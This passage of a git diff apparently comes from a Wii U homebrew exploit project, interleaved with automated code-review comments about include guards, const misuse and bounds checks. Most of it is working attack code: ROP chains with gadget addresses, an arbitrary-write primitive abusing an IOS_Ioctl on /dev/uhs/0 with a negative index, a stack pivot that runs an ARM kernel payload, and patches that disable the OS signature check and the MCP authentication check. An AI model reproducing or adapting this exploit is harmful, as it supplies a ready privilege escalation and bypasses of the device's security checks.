- 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x00000000, // 0x150 value: NOP - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0x1AFFFFFD, // 0x150 value: BNE clean_loop - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 - 0x0, // 0x154 - 0x10123a8b, // 0x158 POP {R3,R4,PC} - 0x1, // 0x15C R3 must be 1 for the arbitrary write - 0x0, // 0x160 - 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x168 - 0x0, // 0x16C - 0x1012EE64, // 0x170 set_panic_behavior 
(arbitrary write) - 0x0, // 0x174 - 0x0, // 0x178 - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE1A03004, // 0x184 value: MOV R3, R4 - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE8BD4010, // 0x184 value: POP {R4,LR} - 0x0, // 0x188 - 0x10123a8b, // 0x18C POP {R3,R4,PC} - 0x1, // 0x190 R3 must be 1 for the arbitrary write - 0x0, // 0x194 - 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x19C - 0x0, // 0x1A0 - 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) - 0x0, // 0x1A8 - 0x0, // 0x1AC - 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} - REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) - 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) - 0x0, // 0x1BC - 0x10123a8b, // 0x1C0 POP {R3,R4,PC} - 0x1, // 0x1C4 R3 must be 1 for the arbitrary write - 0x0, // 0x1C8 - 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x1D0 - 0x0, // 0x1D4 - 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 - 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches - 0x0, // 0x1E0 - 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) - 0x0, // 0x1DC - 0x0, // 0x1E0 - 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} - ARM_CODE_BASE, // 0x1E8 our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP 
{R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(arm_kernel_bin), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x01E40000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 - 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) - 0x0, - 0x0, - 0x101312D0, -}; - -static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x01E30000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} - 0x0, - 0x0, - 0x0, - 0x00110000 - 0x44, // 0x8C - 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} - 0x0, - 0x0, - 0x1012EA68, // 0xAC stack pivot -}; - -static void uhs_exploit_init(unsigned int coreinit_handle); -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); - -void 
__main(void) -{ - unsigned int coreinit_handle; - OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle); - unsigned int sysapp_handle; - OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); - - int (* OSForceFullRelaunch)(void); - OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); - - int (*IOS_Open)(char *path, unsigned int mode); - int (*IOS_Close)(int fd); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); - - void (*OSExitThread)(int); - OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); - - void (*SYSLaunchMenu)(void); - OSDynLoad_FindExport(sysapp_handle, 0, "SYSLaunchMenu", &SYSLaunchMenu); - - OSForceFullRelaunch(); - SYSLaunchMenu(); - - int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node - uhs_exploit_init(coreinit_handle); //! Init variables for the exploit - - //!------ROP CHAIN------- - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); - - uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} - - IOS_Close(dev_uhs_0_handle); - - OSExitThread(0); -} - -static void uhs_exploit_init(unsigned int coreinit_handle) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*memcpy)(void *dst, const void *src, uint32_t length); - void (*memset)(void *dst, const char val, uint32_t length); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "memcpy", &memcpy); - OSDynLoad_FindExport(coreinit_handle, 0, "memset", &memset); - - //! 
Clear out our used MEM1 area - memset((void*)0xF5E00000, 0, 0x00070000); - DCStoreRange((void*)0xF5E00000, 0x00070000); - - //!------Variables used in exploit------ - int *pretend_root_hub = (int*)0xF5E60640; - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[5] = 1; - ayylmao[8] = 0x1E00000; - - memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); - memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); - memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); - memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); - - pretend_root_hub[33] = 0x1E00000; - pretend_root_hub[78] = 0; - - //! Store current CPU cache into main memory for IOSU to read - DCStoreRange(ayylmao, 0x840); - - DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); - DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); - DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); - DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); - - DCStoreRange(pretend_root_hub, 0x160); -} - -static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) -{ - void (*DCStoreRange)(const void *addr, uint32_t length); - void (*OSSleepTicks)(uint64_t ticks); - int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); - OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); - OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); - OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); - - //!------Variables used in exploit------ - int *ayylmao = (int*)0xF5E00000; - //!------------------------------------- - - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read - OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU - //! 
index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, - //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 - int request_buffer[] = { -(0xB349B), val }; - int output_buffer[32]; - return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); -} diff --git a/dsrom/global.h b/dsrom/global.h new file mode 100644 index 0000000..53d191d --- /dev/null +++ b/dsrom/global.h @@ -0,0 +1,10 @@ + +#ifndef _GLOBAL_H_ +#define _GLOBAL_H_ + +#define LAUNCH_SYSMENU 0 +#define LAUNCH_HBL 1 +#define LAUNCH_MOCHA 2 +#define LAUNCH_CFW_IMG 3 + +#endif diff --git a/dsrom/haxchi_rop.s b/dsrom/haxchi_rop.s index f6a2b42..4795944 100644 --- a/dsrom/haxchi_rop.s +++ b/dsrom/haxchi_rop.s @@ -3,8 +3,8 @@ ; more useful definitions HBL_LOADER_ADR equ (0x01800000) +IOSU_PATCHER_ADR equ (0x01804000) SELECTOR_ADDRESS equ (0x01808000) -CFW_BOOTER_ADR equ (0x0180C000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) @@ -224,13 +224,13 @@ rop_start: ; memcpy code call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 - call_func MEMCPY, SELECTOR_ADDRESS, code, code_end - code, 0x0 - call_func MEMCPY, CFW_BOOTER_ADR, cfw_booter, cfw_booter_end - cfw_booter, 0x0 - call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 + call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0 + call_func MEMCPY, SELECTOR_ADDRESS, option_select, option_select_end - option_select, 0x0 + call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; switch codegen to RX call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 - call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xE000, 0x0, 0x0 + call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; execute option_select in codegen .word SELECTOR_ADDRESS 
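Review bot: The include guard `_GLOBAL_H_` on the new header sits in the identifier space reserved for the implementation (leading underscore followed by an uppercase letter), so a libc or compiler header could legitimately define it and silently disable the guard; `GLOBAL_H` or, better, `HAXCHI_GLOBAL_H` avoids that. The four `LAUNCH_*` values also carry no explanation of what consumes them; a one-line comment such as `/* launch target chosen by the selector; value order must match the menu index that picks it */` would help, assuming these are indeed the selector's menu indices (not visible in this hunk). If every consumer is C, an `enum { LAUNCH_SYSMENU = 0, LAUNCH_HBL, LAUNCH_MOCHA, LAUNCH_CFW_IMG }` keeps the same names while making the values visible in a debugger.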
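Review bot: The three payloads are now packed at 0x4000 intervals (HBL_LOADER_ADR 0x01800000, IOSU_PATCHER_ADR 0x01804000, SELECTOR_ADDRESS 0x01808000) and the flush/invalidate span is cut to 0xC000, but nothing checks that any `.incbin` actually fits its 0x4000 slot. If `iosu_patcher.bin` grows past 0x4000 the following MEMCPY of `option_select` silently overwrites its tail, and anything past 0x0180C000 is copied but neither flushed from D-cache nor invalidated in I-cache, so the codegen region would execute stale bytes. If the assembler supports it, an assemble-time guard beside the data labels catches this at build time: `.if (iosu_patcher_end - iosu_patcher) > 0x4000` / `.error "iosu_patcher.bin overflows into option_select"` / `.endif`, and the same for `hbl_loader` and `option_select`. The rop_start body continues outside the hunk.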
@@ -260,16 +260,16 @@ rop_start: .word 0x00000010 ; thread prio .halfword 0x0004 ; thread affinity (core2) - code: - .incbin "code550.bin" - code_end: - hbl_loader: .incbin "hbl_loader.bin" hbl_loader_end: - cfw_booter: - .incbin "cfw_booter.bin" - cfw_booter_end: + iosu_patcher: + .incbin "iosu_patcher.bin" + iosu_patcher_end: + + option_select: + .incbin "option_select.bin" + option_select_end: .Close diff --git a/dsrom/haxchi_rop_cb.s b/dsrom/haxchi_rop_cb.s index 6b39c17..9ec3c2c 100644 --- a/dsrom/haxchi_rop_cb.s +++ b/dsrom/haxchi_rop_cb.s @@ -3,7 +3,8 @@ ; more useful definitions HBL_LOADER_ADR equ (0x01800000) -CBHC_ADDR equ (0x01808000) +IOSU_PATCHER_ADR equ (0x01804000) +CBHC_MENU_ADDR equ (0x01808000) NERD_THREAD0OBJECT equ (HAX_TARGET_ADDRESS - 0x1000) NERD_THREAD2OBJECT equ (HAX_TARGET_ADDRESS - 0x2000) @@ -223,15 +224,16 @@ rop_start: ; memcpy code call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0 - call_func MEMCPY, CBHC_ADDR, cbhc, cbhc_end - cbhc, 0x0 - call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 + call_func MEMCPY, IOSU_PATCHER_ADR, iosu_patcher, iosu_patcher_end - iosu_patcher, 0x0 + call_func MEMCPY, CBHC_MENU_ADDR, cbhc_menu, cbhc_menu_end - cbhc_menu, 0x0 + call_func DC_FLUSHRANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; switch codegen to RX call_func OSCODEGEN_SWITCHSECMODE, 0x1, 0x0, 0x0, 0x0 - call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xFFE0, 0x0, 0x0 + call_func IC_INVALIDATERANGE, HBL_LOADER_ADR, 0xC000, 0x0, 0x0 ; execute option_select in codegen - .word CBHC_ADDR + .word CBHC_MENU_ADDR core0rop_end: ; core 0 thread params @@ -262,8 +264,12 @@ rop_start: .incbin "hbl_loader.bin" hbl_loader_end: - cbhc: - .incbin "cbhc.bin" - cbhc_end: + iosu_patcher: + .incbin "iosu_patcher.bin" + iosu_patcher_end: + + cbhc_menu: + .incbin "cbhc_menu.bin" + cbhc_menu_end: .Close 
diff --git a/dsrom/CBHC/Makefile b/dsrom/iosu_patcher/Makefile similarity index 87% rename from dsrom/CBHC/Makefile rename to dsrom/iosu_patcher/Makefile index fbe0755..4e6abe3 100644 --- a/dsrom/CBHC/Makefile +++ b/dsrom/iosu_patcher/Makefile @@ -6,7 +6,7 @@ CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powe ASFLAGS = -mregnames -x assembler-with-cpp LD = $(PREFIX)ld OBJCOPY = $(PREFIX)objcopy -LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc +LDFLAGS=-Ttext 1804000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc OBJDUMP ?= $(PREFIX)objdump project := . root := $(CURDIR) @@ -44,12 +44,12 @@ main: $(CURDIR)/payload/arm_kernel_bin.h $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -o CBHC.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map CBHC.map - $(OBJCOPY) CBHC.elf -S -O binary ../CBHC.bin + $(LD) -o iosu_patcher.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map iosu_patcher.map + $(OBJCOPY) iosu_patcher.elf -S -O binary ../iosu_patcher.bin clean: rm -rf $(build) payload - rm -rf CBHC.elf CBHC.map + rm -rf iosu_patcher.elf iosu_patcher.map $(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/titleprot -f $(CURDIR)/titleprot/Makefile clean $(MAKE) --no-print-directory -C $(CURDIR)/../../wupserver -f $(CURDIR)/../../wupserver/Makefile clean diff --git a/dsrom/CBHC/arm_kernel/Makefile b/dsrom/iosu_patcher/arm_kernel/Makefile similarity index 100% rename from dsrom/CBHC/arm_kernel/Makefile rename to dsrom/iosu_patcher/arm_kernel/Makefile diff --git a/dsrom/CBHC/arm_kernel/link.ld b/dsrom/iosu_patcher/arm_kernel/link.ld similarity index 100% rename from dsrom/CBHC/arm_kernel/link.ld rename to dsrom/iosu_patcher/arm_kernel/link.ld 
diff --git a/dsrom/CBHC/arm_kernel/source/crt0.s b/dsrom/iosu_patcher/arm_kernel/source/crt0.s similarity index 100% rename from dsrom/CBHC/arm_kernel/source/crt0.s rename to dsrom/iosu_patcher/arm_kernel/source/crt0.s diff --git a/dsrom/CBHC/arm_kernel/source/elf_abi.h b/dsrom/iosu_patcher/arm_kernel/source/elf_abi.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_abi.h rename to dsrom/iosu_patcher/arm_kernel/source/elf_abi.h diff --git a/dsrom/CBHC/arm_kernel/source/elf_patcher.c b/dsrom/iosu_patcher/arm_kernel/source/elf_patcher.c similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_patcher.c rename to dsrom/iosu_patcher/arm_kernel/source/elf_patcher.c diff --git a/dsrom/CBHC/arm_kernel/source/elf_patcher.h b/dsrom/iosu_patcher/arm_kernel/source/elf_patcher.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/elf_patcher.h rename to dsrom/iosu_patcher/arm_kernel/source/elf_patcher.h diff --git a/dsrom/CBHC/arm_kernel/source/getbins.c b/dsrom/iosu_patcher/arm_kernel/source/getbins.c similarity index 84% rename from dsrom/CBHC/arm_kernel/source/getbins.c rename to dsrom/iosu_patcher/arm_kernel/source/getbins.c index 2e128b8..4507f38 100644 --- a/dsrom/CBHC/arm_kernel/source/getbins.c +++ b/dsrom/iosu_patcher/arm_kernel/source/getbins.c @@ -1,6 +1,9 @@ #include "../../payload/titleprot_bin.h" #include "../../payload/wupserver_bin.h" +//not really a bin but still a const val +const int from_cbhc = 1; + const unsigned char *get_titleprot_bin() { return titleprot_bin; diff --git a/dsrom/CBHC/arm_kernel/source/getbins.h b/dsrom/iosu_patcher/arm_kernel/source/getbins.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/getbins.h rename to dsrom/iosu_patcher/arm_kernel/source/getbins.h 
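Review bot: `from_cbhc` is defined `const int` here but is written at runtime by the `kernel_memcpy((void*)(&from_cbhc), (void*)0x01E70110, 4)` added in the arm_kernel main.c hunk and then read through `extern const int from_cbhc;` in the later main.c and reload.c hunks; modifying an object defined `const` is undefined behaviour, the linker may place it in a read-only section, and the compiler is entitled to assume the value never changes and to cache or reorder reads across the copy. Declaring it `volatile int from_cbhc = 1;` here, with `extern volatile int from_cbhc;` in the two consumers, keeps the initial value while making the later store well-defined. The comment `//not really a bin but still a const val` should then say what the variable is for, e.g. `// set to 1 here, overwritten from 0x01E70110 by _main before use`.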
diff --git a/dsrom/CBHC/arm_kernel/source/main.c b/dsrom/iosu_patcher/arm_kernel/source/main.c similarity index 86% rename from dsrom/CBHC/arm_kernel/source/main.c rename to dsrom/iosu_patcher/arm_kernel/source/main.c index d3422e8..d47534b 100644 --- a/dsrom/CBHC/arm_kernel/source/main.c +++ b/dsrom/iosu_patcher/arm_kernel/source/main.c @@ -4,6 +4,7 @@ #include "elf_patcher.h" #include "../../payload/arm_user_bin.h" #include "getbins.h" + static const char repairData_set_fault_behavior[] = { 0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00, 0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02, @@ -41,7 +42,7 @@ static const char os_launch_hook[] = { 0x05, 0x0b, 0xcf, 0xfc, 0x05, 0x05, 0x99, 0x70, 0x05, 0x05, 0x99, 0x7e, }; -static const char sd_path[] = "/vol/sdcard"; +extern const int from_cbhc; #define LAUNCH_SYSMENU 0 #define LAUNCH_HBL 1 @@ -63,8 +64,11 @@ int _main() /* copy in ds vc title id to protect from moving/deleting */ kernel_memcpy((void*)(get_titleprot_bin()+get_titleprot_bin_len()-8), (void*)0x01E70108, 4); - /* get value CBHC used to boot up */ - unsigned int launchmode = *(volatile u32*)0x01E7010C; + /* save if we are booted from CBHC */ + kernel_memcpy((void*)(&from_cbhc), (void*)0x01E70110, 4); + + /* get value CBHC or Haxchi used to boot up */ + unsigned int launchmode = *(volatile int*)0x01E7010C; /* Save the request handle so we can reply later */ *(volatile u32*)0x01E10000 = *(volatile u32*)0x1016AD18; @@ -95,7 +99,10 @@ int _main() // patch OS launch sig check *(volatile u32*)(0x0500A818 - 0x05000000 + 0x081C0000) = 0x20002000; // mov r0, #0; mov r0, #0 + } + if(launchmode != LAUNCH_MOCHA && launchmode != LAUNCH_CFW_IMG) + { // patch MCP authentication check *(volatile u32*)(0x05014CAC - 0x05000000 + 0x081C0000) = 0x20004770; // mov r0, #0; bx lr 
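Review bot: `launchmode` is read from 0x01E7010C in the `@@ -63` hunk and compared against individual `LAUNCH_*` values, but no branch handles a value outside the four defined ones; such a value falls into the new `launchmode != LAUNCH_MOCHA && launchmode != LAUNCH_CFW_IMG` branch and receives the MCP authentication patch as if it were a known mode. Since the value comes from memory written by the PowerPC side, it is worth rejecting unrecognised values explicitly right after the read, e.g. `if (launchmode > LAUNCH_CFW_IMG) return 0; /* unknown mode: apply no patches */` (or whatever the file's error convention is), rather than letting them match by exclusion. `_main` starts and ends outside these hunks.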
@@ -120,12 +127,15 @@ int _main() *(volatile u32*)(0x05054D6C - 0x05000000 + 0x081C0000) = 0xE3A00000; // mov r0, 0 *(volatile u32*)(0x05054D70 - 0x05000000 + 0x081C0000) = 0xE12FFF1E; // bx lr - // change system.xml to syshax.xml - *(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha - *(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + if(from_cbhc) // coldboot specific patches + { + // change system.xml to syshax.xml + *(volatile u32*)(0x050600F0 - 0x05060000 + 0x08220000) = 0x79736861; // ysha + *(volatile u32*)(0x050600F4 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm - *(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha - *(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + *(volatile u32*)(0x05060114 - 0x05060000 + 0x08220000) = 0x79736861; // ysha + *(volatile u32*)(0x05060118 - 0x05060000 + 0x08220000) = 0x782E786D; // x.xm + } // jump to titleprot code (titleprot_addr+4) *(volatile u32*)(0x05107F70 - 0x05100000 + 0x13D80000) = 0xF005FD0A; //bl (titleprot_addr+4) @@ -157,8 +167,8 @@ int _main() { int i; for (i = 0; i < 32; i++) - if (i < 11) - ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = sd_path[i]; + if (i < 31) + ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = ((char*)0x01E70000)[i]; else ((char*)(0x050663B4 - 0x05000000 + 0x081C0000))[i] = (char)0; 
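Review bot: The path copy in the `@@ -157` hunk now takes 31 bytes from 0x01E70000 and forces only byte 31 to NUL, so a longer string placed there by the PowerPC side is silently truncated; option_select writes that buffer with `__os_snprintf(..., 32, "/vol/sdcard")` on one path but with a 250-byte limit on another, and whether those longer strings can reach this copy depends on code outside the hunk. A comment on the loop such as `// path from 0x01E70000: at most 31 chars, must match option_select's 32-byte snprintf` would record the contract, and the removal of the fixed `sd_path` fallback means an empty or unflushed buffer now yields an empty path rather than "/vol/sdcard", which is worth a note too. `_main` continues outside the hunk.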
@@ -168,12 +178,15 @@ int _main() ((char*)(0x05059938 - 0x05000000 + 0x081C0000))[i] = os_launch_hook[i]; } - // patch default title id to system menu - *(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100; - *(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104; + if(from_cbhc) // coldboot specific patches + { + // patch default title id to system menu + *(volatile u32*)(0x050B817C - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70100; + *(volatile u32*)(0x050B8180 - 0x05074000 + 0x08234000) = *(volatile u32*)0x01E70104; - // force check USB storage on load - *(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag + // force check USB storage on load + *(volatile u32*)(0xE012202C - 0xE0000000 + 0x12900000) = 0x00000001; // find USB flag + } *(volatile u32*)(0x1555500) = 0; diff --git a/dsrom/CBHC/arm_kernel/source/mmu.s b/dsrom/iosu_patcher/arm_kernel/source/mmu.s similarity index 100% rename from dsrom/CBHC/arm_kernel/source/mmu.s rename to dsrom/iosu_patcher/arm_kernel/source/mmu.s diff --git a/dsrom/CBHC/arm_kernel/source/reload.c b/dsrom/iosu_patcher/arm_kernel/source/reload.c similarity index 90% rename from dsrom/CBHC/arm_kernel/source/reload.c rename to dsrom/iosu_patcher/arm_kernel/source/reload.c index 5aff760..704e379 100644 --- a/dsrom/CBHC/arm_kernel/source/reload.c +++ b/dsrom/iosu_patcher/arm_kernel/source/reload.c @@ -6,6 +6,7 @@ #include "getbins.h" extern char __file_start, __file_end; +extern const int from_cbhc; void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) { 
